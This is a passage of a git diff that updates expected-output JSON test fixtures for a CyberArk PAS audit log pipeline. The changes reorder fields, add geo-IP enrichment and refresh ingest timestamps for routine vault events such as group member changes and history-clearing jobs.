Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PVWAGWAccounts\",\"TargetUser\":\"PSMPGW_VAGRANT\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.15", - "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -635,6 +722,11 @@ "67.43.156.15" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -654,28 +746,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", + "ip": "67.43.156.15" + }, "event": { "severity": 2, "action": "add group member", - "ingested": "2021-12-09T13:36:42.577525Z", + "ingested": "2021-12-14T14:42:06.913531290Z", "original": "\u003c5\u003e1 2021-03-14T12:57:17Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:17\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:17Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e265\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd Group Member\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd Group Member\u003c/Action\u003e\\n \u003cSourceUser\u003ePVWAGWAccounts\u003c/SourceUser\u003e\\n \u003cTargetUser\u003ePSMPGW_SSH\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd Group Member\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:17\",\"IsoTimestamp\":\"2021-03-14T12:57:17Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PVWAGWAccounts\",\"TargetUser\":\"PSMPGW_SSH\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.15", - "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -691,6 +787,11 @@ "67.43.156.15" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -710,28 +811,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", + "ip": "67.43.156.15" + }, "event": { "severity": 2, "action": "add group member", - "ingested": "2021-12-09T13:36:42.577530300Z", + "ingested": "2021-12-14T14:42:06.913531672Z", "original": "\u003c5\u003e1 2021-03-14T12:57:17Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:17\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:17Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e265\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd Group Member\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd Group Member\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMAppUsers\u003c/SourceUser\u003e\\n \u003cTargetUser\u003ePSMPApp_SSH\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd Group Member\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:17\",\"IsoTimestamp\":\"2021-03-14T12:57:17Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PSMAppUsers\",\"TargetUser\":\"PSMPApp_SSH\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.15", - "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -747,6 +852,11 @@ "67.43.156.15" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -766,14 +876,30 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", + "ip": "67.43.156.15" + }, "event": { "severity": 2, "action": "add group member", - "ingested": "2021-12-09T13:36:42.577535700Z", + "ingested": "2021-12-14T14:42:06.913532044Z", "original": "\u003c5\u003e1 2021-03-14T12:57:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:21\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:21Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e265\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd Group Member\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd Group Member\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMP_ADB_AppUsers\u003c/SourceUser\u003e\\n \u003cTargetUser\u003ePSMP_ADB_asr-cyberark-psm-ssh\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd Group Member\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:21\",\"IsoTimestamp\":\"2021-03-14T12:57:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PSMP_ADB_AppUsers\",\"TargetUser\":\"PSMP_ADB_asr-cyberark-psm-ssh\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-266-remove-group-member.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-266-remove-group-member.log-expected.json index ef28e482a25..6791319e26e 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-266-remove-group-member.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-266-remove-group-member.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -28,6 +16,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -46,28 +39,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 2, "action": "remove group member", - "ingested": "2021-12-09T13:36:43.685157200Z", + "ingested": "2021-12-14T14:42:08.547675390Z", "original": "\u003c5\u003e1 2021-03-10T17:59:48Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:59:48\",\"IsoTimestamp\":\"2021-03-10T17:59:48Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"266\",\"Desc\":\"Remove Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Remove Group Member\",\"SourceUser\":\"PSMMaster\",\"TargetUser\":\"Administrator\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Remove Group Member\",\"GatewayStation\":\"\"}}}", "code": "266", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.14", - "ip": "67.43.156.14" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -83,6 +80,11 @@ "67.43.156.14" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -101,14 +103,30 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.14", + "ip": "67.43.156.14" + }, "event": { "severity": 2, "action": "remove group member", - "ingested": "2021-12-09T13:36:43.685166800Z", + "ingested": "2021-12-14T14:42:08.547678207Z", "original": "\u003c5\u003e1 2021-03-10T22:19:23Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:19:23\",\"IsoTimestamp\":\"2021-03-10T22:19:23Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"266\",\"Desc\":\"Remove Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Remove Group Member\",\"SourceUser\":\"PSMMaster\",\"TargetUser\":\"Administrator\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Remove Group Member\",\"GatewayStation\":\"\"}}}", "code": "266", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-273-remove-owner.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-273-remove-owner.log-expected.json index 82d2016ad8d..a12921b737a 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-273-remove-owner.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-273-remove-owner.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -28,6 +16,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -46,14 +39,30 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 2, "action": "remove owner", - "ingested": "2021-12-09T13:36:43.869926900Z", + "ingested": "2021-12-14T14:42:08.795442349Z", "original": "\u003c5\u003e1 2021-03-10T17:59:33Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:59:33\",\"IsoTimestamp\":\"2021-03-10T17:59:33Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"273\",\"Desc\":\"Remove Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Remove Owner\",\"SourceUser\":\"Administrator\",\"TargetUser\":\"\",\"Safe\":\"PSMSessions\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Remove Owner\",\"GatewayStation\":\"\"}}}", "code": "273", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-278-add-rule.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-278-add-rule.log-expected.json index f942646255c..ae4dfdb0b56 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-278-add-rule.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-278-add-rule.log-expected.json @@ -55,7 +55,7 @@ "event": { "severity": 2, "action": "add rule", - "ingested": "2021-12-09T13:36:43.972786Z", + "ingested": "2021-12-14T14:42:08.933990028Z", "original": "\u003c5\u003e1 2021-03-11T18:01:14Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 10:01:14\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T18:01:14Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e278\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd Rule\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePVWAAppUser\u003c/Issuer\u003e\\n \u003cAction\u003eAdd Rule\u003c/Action\u003e\\n \u003cSourceUser\u003eAdministrator\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMUnmanagedSessionAccounts\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\2\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eAllow\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd Rule\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 10:01:14\",\"IsoTimestamp\":\"2021-03-11T18:01:14Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"278\",\"Desc\":\"Add Rule\",\"Severity\":\"Info\",\"Issuer\":\"PVWAAppUser\",\"Action\":\"Add Rule\",\"SourceUser\":\"Administrator\",\"TargetUser\":\"\",\"Safe\":\"PSMUnmanagedSessionAccounts\",\"File\":\"Root\\\\2\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"Allow\",\"ExtraDetails\":\"\",\"Message\":\"Add Rule\",\"GatewayStation\":\"\"}}}", "code": "278", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-288-auto-clear-users-history-start.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-288-auto-clear-users-history-start.log-expected.json index 73b2242f20c..1eaf8b49c2a 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-288-auto-clear-users-history-start.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-288-auto-clear-users-history-start.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "0.0.0.0", - "ip": "0.0.0.0" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -28,6 +16,11 @@ "0.0.0.0" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -44,14 +37,21 @@ "host": { "name": "VAULT" }, + "source": { + "address": "0.0.0.0", + "ip": "0.0.0.0" + }, "event": { "severity": 2, "action": "auto clear users history start", - "ingested": "2021-12-09T13:36:44.088513500Z", + "ingested": "2021-12-14T14:42:09.071013489Z", "original": "\u003c5\u003e1 2021-03-05T11:00:06Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 05 03:00:06\",\"IsoTimestamp\":\"2021-03-05T11:00:06Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"288\",\"Desc\":\"Auto Clear Users History start\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Auto Clear Users History start\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Auto Clear Users History start\",\"GatewayStation\":\"\"}}}", "code": "288", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] }, { "observer": { @@ -90,7 +90,7 @@ "event": { "severity": 2, "action": "auto clear users history start", - "ingested": "2021-12-09T13:36:44.088521700Z", + "ingested": "2021-12-14T14:42:09.071016886Z", "original": "Mar 08 03:00:20 VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"288\",\"Desc\":\"Auto Clear Users History start\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Auto Clear Users History start\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Auto Clear Users History start\",\"GatewayStation\":\"\"}}}", "code": "288", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-289-auto-clear-users-history-end.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-289-auto-clear-users-history-end.log-expected.json index b9c3b31e63d..3bca99c9ef1 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-289-auto-clear-users-history-end.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-289-auto-clear-users-history-end.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "0.0.0.0", - "ip": "0.0.0.0" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -28,6 +16,11 @@ "0.0.0.0" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -44,14 +37,21 @@ "host": { "name": "VAULT" }, + "source": { + "address": "0.0.0.0", + "ip": "0.0.0.0" + }, "event": { "severity": 2, "action": "auto clear users history end", - "ingested": "2021-12-09T13:36:44.255396Z", + "ingested": "2021-12-14T14:42:09.282782025Z", "original": "\u003c5\u003e1 2021-03-05T11:00:06Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 05 03:00:06\",\"IsoTimestamp\":\"2021-03-05T11:00:06Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"289\",\"Desc\":\"Auto Clear Users History end\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Auto Clear Users History end\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Auto Clear Users History end\",\"GatewayStation\":\"\"}}}", "code": "289", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] }, { "observer": { @@ -90,7 +90,7 @@ "event": { "severity": 2, "action": "auto clear users history end", - "ingested": "2021-12-09T13:36:44.255404400Z", + "ingested": "2021-12-14T14:42:09.282784853Z", "original": "Mar 08 03:00:20 VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"289\",\"Desc\":\"Auto Clear Users History end\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Auto Clear Users History end\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Auto Clear Users History end\",\"GatewayStation\":\"\"}}}", "code": "289", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-290-auto-clear-safes-history-start.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-290-auto-clear-safes-history-start.log-expected.json index 2dba10224d3..39729a17c4a 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-290-auto-clear-safes-history-start.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-290-auto-clear-safes-history-start.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "0.0.0.0", - "ip": "0.0.0.0" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -28,6 +16,11 @@ "0.0.0.0" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -44,14 +37,21 @@ "host": { "name": "VAULT" }, + "source": { + "address": "0.0.0.0", + "ip": "0.0.0.0" + }, "event": { "severity": 2, "action": "auto clear safes history start", - "ingested": "2021-12-09T13:36:44.417420500Z", + "ingested": "2021-12-14T14:42:09.486532095Z", "original": "\u003c5\u003e1 2021-03-09T09:00:47Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 09 01:00:47\",\"IsoTimestamp\":\"2021-03-09T09:00:47Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"290\",\"Desc\":\"Auto Clear Safes History start\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Auto Clear Safes History start\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Auto Clear Safes History start\",\"GatewayStation\":\"\"}}}", "code": "290", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-291-auto-clear-safes-history-end.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-291-auto-clear-safes-history-end.log-expected.json index db7bc649ddb..21f516ef1fd 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-291-auto-clear-safes-history-end.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-291-auto-clear-safes-history-end.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "0.0.0.0", - "ip": "0.0.0.0" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -28,6 +16,11 @@ "0.0.0.0" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -44,14 +37,21 @@ "host": { "name": "VAULT" }, + "source": { + "address": "0.0.0.0", + "ip": "0.0.0.0" + }, "event": { "severity": 